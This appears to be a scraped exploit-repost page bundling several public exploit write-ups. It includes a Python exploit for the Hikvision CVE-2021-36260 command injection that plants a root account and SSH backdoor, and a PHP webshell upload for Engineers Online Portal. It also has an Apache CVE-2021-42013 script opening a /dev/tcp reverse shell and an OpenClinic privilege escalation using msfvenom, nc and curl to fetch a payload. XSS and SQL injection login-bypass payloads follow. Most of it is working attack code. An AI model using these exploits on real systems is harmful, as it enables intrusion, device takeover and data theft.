input('[+] Enter your LPORT: ') print("") HPW= "'"+LHOST+"'"+','+LPORT HPL= ""+LHOST+""+'/'+LPORT print('[+] Option 1: Windows') print('[+] Option 2: Linux') option = input('[+] Choose OS: ') if option == "1": windows(HPW,host,shell_name) exit() elif option == "2": linux(HPL,host,shell_name) exit() else: print("Please choose Windows or Linux") main() #Usage: python3 host shell_name #Example: python3 http://localhost/clinic shell
HireHackking

Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS) # Date: 20/10/2021 # Exploit Author: Ghuliev # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Tested on: Server: Ubuntu When a user or admin creates a ticket, we can inject javascript code into ticket. POST /crm/create-ticket.php HTTP/1.1 Host: IP Content-Length: 79 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP/crm/create-ticket.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7 subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
HireHackking

Hikvision Web Server Build 210702 - Command Injection

HACKER · %s · %s

# Exploit Title: Hikvision Web Server Build 210702 - Command Injection # Exploit Author: bashis # Vendor Homepage: https://www.hikvision.com/ # Version: 1.0 # CVE: CVE-2021-36260 # Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html # All credit to Watchful_IP #!/usr/bin/env python3 """ Note: 1) This code will _not_ verify if remote is Hikvision device or not. 2) Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices. Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit. I think the combined verification code should have very high accuracy. 3) 'safe check' (--check) will try write and read for verification 'unsafe check' (--reboot) will try reboot the device for verification [Examples] Safe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot Unsafe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot Launch and connect to SSH shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell Execute command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l" Execute blind command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot" $./CVE-2021-36260.py -h [*] Hikvision CVE-2021-36260 [*] PoC by bashis <mcw noemail eu> (2021) usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] [--reboot] [--shell] [--cmd CMD] [--cmd_blind CMD_BLIND] [--noverify] [--proto {http,https}] optional arguments: -h, --help show this help message and exit --rhost RHOST Remote Target Address (IP/FQDN) --rport RPORT Remote Target Port --check Check if vulnerable --reboot Reboot if vulnerable --shell Launch SSH shell --cmd CMD execute cmd (i.e: "ls -l") --cmd_blind CMD_BLIND execute blind cmd (i.e: "reboot") --noverify Do not verify if vulnerable --proto {http,https} Protocol used $ """ import os import argparse import time import requests from requests import packages from requests.packages import urllib3 from requests.packages.urllib3 import exceptions class Http(object): def __init__(self, rhost, rport, proto, timeout=60): super(Http, self).__init__() self.rhost = rhost self.rport = rport self.proto = proto self.timeout = timeout self.remote = None self.uri = None """ Most devices will use self-signed certificates, suppress any warnings """ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) self.remote = requests.Session() self._init_uri() self.remote.headers.update({ 'Host': f'{self.rhost}:{self.rport}', 'Accept': '*/*', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8', }) """ self.remote.proxies.update({ # 'http': 'http://127.0.0.1:8080', }) """ def send(self, url=None, query_args=None, timeout=5): if query_args: """Some devices can handle more, others less, 22 bytes seems like a good compromise""" if len(query_args) > 22: print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})') return None """This weird code will try automatically switch between http/https and update Host """ try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: self.proto = 'https' if self.proto == 'http' else 'https' self._init_uri() try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: return None except requests.exceptions.RequestException: return None except KeyboardInterrupt: return None """302 when requesting http on https enabled device""" if data.status_code == 302: redirect = data.headers.get('Location') self.uri = redirect[:redirect.rfind('/')] self._update_host() if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) return data def _update_host(self): if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]: self.remote.headers.update({ 'Host': self.uri[self.uri.rfind('://') + 3:], }) def _init_uri(self): self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport)) def put(self, url, query_args, timeout): """Command injection in the <language> tag""" query_args = '<?xml version="1.0" encoding="UTF-8"?>' \ f'<language>$({query_args})</language>' return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout) def get(self, url, timeout): return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout) def check(remote, args): """ status_code == 200 (OK); Verified vulnerable and exploitable status_code == 500 (Internal Server Error); Device may be vulnerable, but most likely not The SDK webLanguage tag is there, but generate status_code 500 when language not found I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500) (Issue: Could also be other directory than 'webLib', r/o FS etc...) status_code == 401 (Unauthorized); Defiantly not vulnerable """ if args.noverify: print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"') return True print(f'[*] Checking remote "{args.rhost}:{args.rport}"') data = remote.send(url='/', query_args=None) if data is None: print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"') return None print('[i] ETag:', data.headers.get('ETag')) data = remote.send(query_args='>webLib/c') if data is None or data.status_code == 404: print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision') return False status_code = data.status_code data = remote.send(url='/c', query_args=None) if not data.status_code == 200: """We could not verify command injection""" if status_code == 500: print(f'[-] Could not verify if vulnerable (Code: {status_code})') if args.reboot: return check_reboot(remote, args) else: print(f'[+] Remote is not vulnerable (Code: {status_code})') return False print('[!] Remote is verified exploitable') return True def check_reboot(remote, args): """ We sending 'reboot', wait 2 sec, then checking with GET request. - if there is data returned, we can assume remote is not vulnerable. - If there is no connection or data returned, we can assume remote is vulnerable. """ if args.check: print('[i] Checking if vulnerable with "reboot"') else: print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"') remote.send(query_args='reboot') time.sleep(2) if not remote.send(url='/', query_args=None): print('[!] Remote is vulnerable') return True else: print('[+] Remote is not vulnerable') return False def cmd(remote, args): if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd}>webLib/x') if data is None: return False data = remote.send(url='/x', query_args=None) if data is None or not data.status_code == 200: print(f'[!] Error execute cmd "{args.cmd}"') return False print(data.text) return True def cmd_blind(remote, args): """ Blind command injection """ if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd_blind}') if data is None or not data.status_code == 500: print(f'[-] Error execute cmd "{args.cmd_blind}"') return False print(f'[i] Try execute blind cmd "{args.cmd_blind}"') return True def shell(remote, args): if not check(remote, args): return False data = remote.send(url='/N', query_args=None) if data.status_code == 404: print(f'[i] Remote "{args.rhost}" not pwned, pwning now!') data = remote.send(query_args='echo -n P::0:0:W>N') if data.status_code == 401: print(data.headers) print(data.text) return False remote.send(query_args='echo :/:/bin/sh>>N') remote.send(query_args='cat N>>/etc/passwd') remote.send(query_args='dropbear -R -B -p 1337') remote.send(query_args='cat N>webLib/N') else: print(f'[i] Remote "{args.rhost}" already pwned') print(f'[*] Trying SSH to {args.rhost} on port 1337') os.system(f'stty echo; stty iexten; stty icanon; \ ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \ P@{args.rhost} -p 1337') def main(): print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)') parser = argparse.ArgumentParser() parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)') parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port') parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable') parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable') parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell') parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")') parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")') parser.add_argument( '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable' ) parser.add_argument( '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used' ) args = parser.parse_args() remote = Http(args.rhost, args.rport, args.proto) try: if args.shell: shell(remote, args) elif args.cmd: cmd(remote, args) elif args.cmd_blind: cmd_blind(remote, args) elif args.check: check(remote, args) elif args.reboot: check_reboot(remote, args) else: parser.parse_args(['-h']) except KeyboardInterrupt: return False if __name__ == '__main__': main()
HireHackking

Netgear Genie 2.4.64 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 2.4.64 # Date: 23.10.2021 # Vendor Homepage: https://www.netgear.com/ # Tested on: Windows 10 C:\Users\Mert>sc qc NETGEARGenieDaemon [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NETGEARGenieDaemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NETGEARGenieDaemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) # Date: 10/23/2021 # Exploit Author: SadKris # Venor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Version: 1.0 # Tested on: XAMPP, Windows 11 # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /EngineerShit/teacher_avatar.php HTTP/1.1 Host: localhost.me Content-Length: 510 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost.me Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost.me/EngineerShit/dasboard_teacher.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="image"; filename="vuln.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="change" # Response HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:51:19 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 <script> window.location = "dasboard_teacher.php"; </script> # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1 Host: localhost.me Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:54:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 154 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> gottem bois
HireHackking

OpenClinic GA 5.194.18 - Local Privilege Escalation

HACKER · %s · %s

# Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation # Date: 2021-07-24 # Author: Alessandro Salzano # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download # Version: 5.194.18 # Tested on: Microsoft Windows 10 Enterprise x64 Open Source Integrated Hospital Information Management System. OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities. Vendor: OpenClinic GA. Affected version: > 5.194.18 # Details # By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below. # A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\projects\openclinic\mariadb\bin\mysqld.exe Details: SERVICE_NAME: OpenClinicHttp TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicHttp DEPENDENCIES : Tcpip : Afd SERVICE_START_NAME : NT Authority\LocalServic -------- SERVICE_NAME: OpenClinicMySQL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicMySQL DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: icacls C:\projects\openclinic C:\projects\openclinic Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
HireHackking

Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)

HACKER · %s · %s

# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) # Credits: Ash Daulton & cPanel Security Team # Date: 24/07/2021 # Exploit Author: TheLastVvV.com # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.50 with CGI enable # Tested on : Debian 5.10.28 # CVE : CVE-2021-42013 #!/bin/bash echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' if [ $# -eq 0 ] then echo "try: ./$0 http://ip:port LHOST LPORT" exit 1 fi curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh" #usage chmod -x CVE-2021-42013.sh #./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
HireHackking
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # CVE : cve-2021-42664 # Vulnerable page: add_quiz.php # Vulnerable Parameters: "quiz_title", "description" Technical description: A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php 2) Insert your payload in the "quiz_title" parameter or the "description" parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS Give me your cookies")</script> --- POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save= OR POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6 Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save= ---
HireHackking

Engineers Online Portal 1.0 - 'id' SQL Injection

HACKER · %s · %s

# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: quiz_question.php # Vulnerable Parameter: "id" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php 2) Insert your payload in the id parameter Proof of concept (Poc): The following payload will allow you to extract the MySql server version running on the web server - ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- - --- GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 ---
HireHackking

Engineers Online Portal 1.0 - 'multiple' Authentication Bypass

HACKER · %s · %s

# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: login.php # VUlnerable parameters: "username", "password" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - ' OR '1'='1';-- - --- POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 41 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username='+or+'1'%3D'1'%3B--+-&password=sqli OR POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username=sqli&password='+or+'1'%3D'1'%3B--+- ---